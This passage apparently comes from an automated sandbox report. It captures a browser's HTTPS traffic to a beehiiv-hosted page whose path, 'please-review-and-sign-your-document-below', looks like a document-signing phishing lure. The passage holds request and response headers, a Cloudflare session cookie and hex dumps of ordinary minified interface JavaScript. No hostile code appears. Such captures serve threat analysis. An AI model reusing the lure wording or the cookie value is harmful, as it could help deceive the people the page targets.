                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 2e 42 75 74 74 6f 6e 20 2f 3e 20 62 75 74 20 6f 6e 6c 79 20 31 20 3c 50 6f 70 6f 76 65 72 2e 42 75 74 74 6f 6e 20 2f 3e 20 69 73 20 73 75 70 70 6f 72 74 65 64 2e 22 29 2c 6f 26 26 72 28 7b 74 79 70 65 3a 32 2c 62 75 74 74 6f 6e 3a 6f 7d 29 7d 29 2c 79 3d 55 28 76 2c 74 29 2c 73 3d 61 65 28 76 29 2c 6d 3d 49 28 6f 3d 3e 7b 76 61 72 20 64 2c 45 2c 78 3b 69 66 28 6e 29 7b 69 66 28 6c 2e 70 6f 70 6f 76 65 72 53 74 61 74 65 3d 3d 3d 31 29 72 65 74 75 72 6e 3b 73 77 69 74 63 68 28 6f 2e 6b 65 79 29 7b 63 61 73 65 20 41 2e 53 70 61 63 65 3a 63 61 73 65 20 41 2e 45 6e 74 65 72 3a 6f 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 28 45 3d 28 64 3d 6f 2e 74 61 72 67 65 74 29 2e 63 6c 69 63 6b 29 3d 3d 6e 75 6c 6c 7c 7c 45 2e 63 61 6c 6c 28 64 29 2c 72 28 7b
                                                                                                                                            Data Ascii: .Button /> but only 1 <Popover.Button /> is supported."),o&&r({type:2,button:o})}),y=U(v,t),s=ae(v),m=I(o=>{var d,E,x;if(n){if(l.popoverState===1)return;switch(o.key){case A.Space:case A.Enter:o.preventDefault(),(E=(d=o.target).click)==null||E.call(d),r({
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 72 28 45 3d 3e 45 2e 64 61 74 61 73 65 74 2e 68 65 61 64 6c 65 73 73 75 69 46 6f 63 75 73 47 75 61 72 64 21 3d 3d 22 74 72 75 65 22 29 2c 48 28 77 2e 63 75 72 72 65 6e 74 2c 7b 5b 44 2e 46 6f 72 77 61 72 64 73 5d 3a 52 2e 4e 65 78 74 2c 5b 44 2e 42 61 63 6b 77 61 72 64 73 5d 3a 52 2e 50 72 65 76 69 6f 75 73 7d 29 2c 7b 72 65 6c 61 74 69 76 65 54 6f 3a 6c 2e 62 75 74 74 6f 6e 7d 29 7d 64 28 29 7d 29 3b 72 65 74 75 72 6e 20 24 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 24 2e 46 72 61 67 6d 65 6e 74 2c 6e 75 6c 6c 2c 71 28 7b 6f 75 72 50 72 6f 70 73 3a 70 2c 74 68 65 69 72 50 72 6f 70 73 3a 67 2c 73 6c 6f 74 3a 6a 2c 64 65 66 61 75 6c 74 54 61 67 3a 59 65 2c 6e 61 6d 65 3a 22 50 6f 70 6f 76 65 72 2e 42 75 74 74 6f 6e 22 7d 29 2c 5f 26 26 21 6e 26 26 66 26
                                                                                                                                            Data Ascii: r(E=>E.dataset.headlessuiFocusGuard!=="true"),H(w.current,{[D.Forwards]:R.Next,[D.Backwards]:R.Previous}),{relativeTo:l.button})}d()});return $.createElement($.Fragment,null,q({ourProps:p,theirProps:g,slot:j,defaultTag:Ye,name:"Popover.Button"}),_&&!n&&f&


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            110192.168.2.1649837104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC560OUTGET /assets/ChevronDownIcon-CCywpT3m.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC896INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 902
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"386-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b90cc443bf-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC473INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 30 61 39 34 61 64 61 2d 33 61 30 65 2d 35 30 35 66 2d 62 30 64 36 2d 63 33 38 64 64 35 33 64 33 35 34 33 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="50a94ada-3a0e-505f-b0d6-c38dd53d3543")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC429INData Raw: 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6f 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 61 7d 2c 6c 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 61 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 31 32 2e 35 33 20 31 36 2e 32 38 61 2e 37 35 2e 37 35 20 30 20 30 20 31 2d 31 2e 30 36 20 30 6c 2d 37 2e 35 2d 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 31 2e 30 36 2d 31 2e 30 36 4c 31 32 20 31 34 2e 36 39 6c 36 2e 39 37 2d 36 2e 39 37 61 2e 37 35 2e 37 35 20 30 20 31 20 31 20 31 2e 30 36 20 31 2e 30 36 6c 2d 37
                                                                                                                                            Data Ascii: n":"true","data-slot":"icon",ref:o,"aria-labelledby":a},l),r?e.createElement("title",{id:a},r):null,e.createElement("path",{fillRule:"evenodd",d:"M12.53 16.28a.75.75 0 0 1-1.06 0l-7.5-7.5a.75.75 0 0 1 1.06-1.06L12 14.69l6.97-6.97a.75.75 0 1 1 1.06 1.06l-7


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            111192.168.2.1649838104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC853OUTGET /assets/useSignupRedirects-DpD4LtfX.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1971
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"7b3-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4165
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b969bd41b4-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 35 32 37 62 66 38 61 2d 38 64 35 61 2d 35 36 31 63 2d 38 64 61 35 2d 35 64 62 31 66 38 66 64 63 63 66 37 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f527bf8a-8d5a-561c-8da5-5db1f8fdccf7")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 29 2c 5b 52 5d 3d 77 28 29 2c 68 3d 65 3f 65 3f 2e 72 65 64 69 72 65 63 74 73 3f 2e 6c 65 6e 67 74 68 3a 30 2c 45 3d 28 65 3f 65 3f 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 2b 31 3a 30 29 2f 68 2a 31 30 30 2c 72 3d 28 29 3d 3e 7b 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 75 2e 53 49 47 4e 55 50 5f 52 45 44 49 52 45 43 54 53 29 7d 3b 72 65 74 75 72 6e 20 78 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 73 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 75 2e 53 49 47 4e 55 50 5f 52 45 44 49 52 45 43 54 53 29 3b 69 66 28 73 29 7b 63 6f 6e 73 74 20 63 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 29 2e 73 74 61 72 74 65 64 41 74 2c 6e 3d 6e 65 77 20 44 61 74 65 28 63 29 2e 67 65 74 54 69 6d 65 28 29
                                                                                                                                            Data Ascii: ),[R]=w(),h=e?e?.redirects?.length:0,E=(e?e?.currentIndex+1:0)/h*100,r=()=>{localStorage.removeItem(u.SIGNUP_REDIRECTS)};return x.useEffect(()=>{const s=localStorage.getItem(u.SIGNUP_REDIRECTS);if(s){const c=JSON.parse(s).startedAt,n=new Date(c).getTime()
                                                                                                                                            2025-01-15 18:14:38 UTC145INData Raw: 67 69 66 79 28 6d 29 29 2c 74 28 6c 29 7d 7d 7d 7d 7d 2c 79 3d 43 3b 65 78 70 6f 72 74 7b 79 20 61 73 20 75 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 75 73 65 53 69 67 6e 75 70 52 65 64 69 72 65 63 74 73 2d 44 70 44 34 4c 74 66 58 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 66 35 32 37 62 66 38 61 2d 38 64 35 61 2d 35 36 31 63 2d 38 64 61 35 2d 35 64 62 31 66 38 66 64 63 63 66 37 0a
                                                                                                                                            Data Ascii: gify(m)),t(l)}}}}},y=C;export{y as u};//# sourceMappingURL=useSignupRedirects-DpD4LtfX.js.map//# debugId=f527bf8a-8d5a-561c-8da5-5db1f8fdccf7


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            112192.168.2.1649840104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC844OUTGET /assets/CheckIcon-681VH8qr.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 838
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"346-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4165
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b9eeb942be-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 61 61 37 66 38 66 39 61 2d 66 37 61 33 2d 35 31 32 64 2d 39 32 35 66 2d 38 33 38 30 63 35 64 66 32 32 65 33 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="aa7f8f9a-f7a3-512d-925f-8380c5df22e3")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC380INData Raw: 6b 65 57 69 64 74 68 3a 31 2e 35 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 74 7d 2c 6f 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 74 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 2c 64 3a 22 6d 34 2e 35 20 31 32 2e 37 35 20 36 20 36 20 39 2d 31 33 2e 35 22 7d 29 29 7d 63 6f 6e 73 74 20 69 3d 65 2e 66 6f
                                                                                                                                            Data Ascii: keWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"m4.5 12.75 6 6 9-13.5"}))}const i=e.fo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            113192.168.2.1649839104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC853OUTGET /assets/useTypedLoaderData-Bk1_tu68.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 446
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"1be-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4165
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8ba0d727c7e-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC446INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 37 33 64 30 38 61 39 66 2d 61 30 30 38 2d 35 64 31 36 2d 38 35 31 31 2d 30 38 37 65 30 31 36 63 65 64 34 62 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="73d08a9f-a008-5d16-8511-087e016ced4b")}catch(


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            114192.168.2.1649841104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC860OUTGET /assets/useWebBuilderCommunicator-DoXoLq6Y.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1035
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"40b-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4165
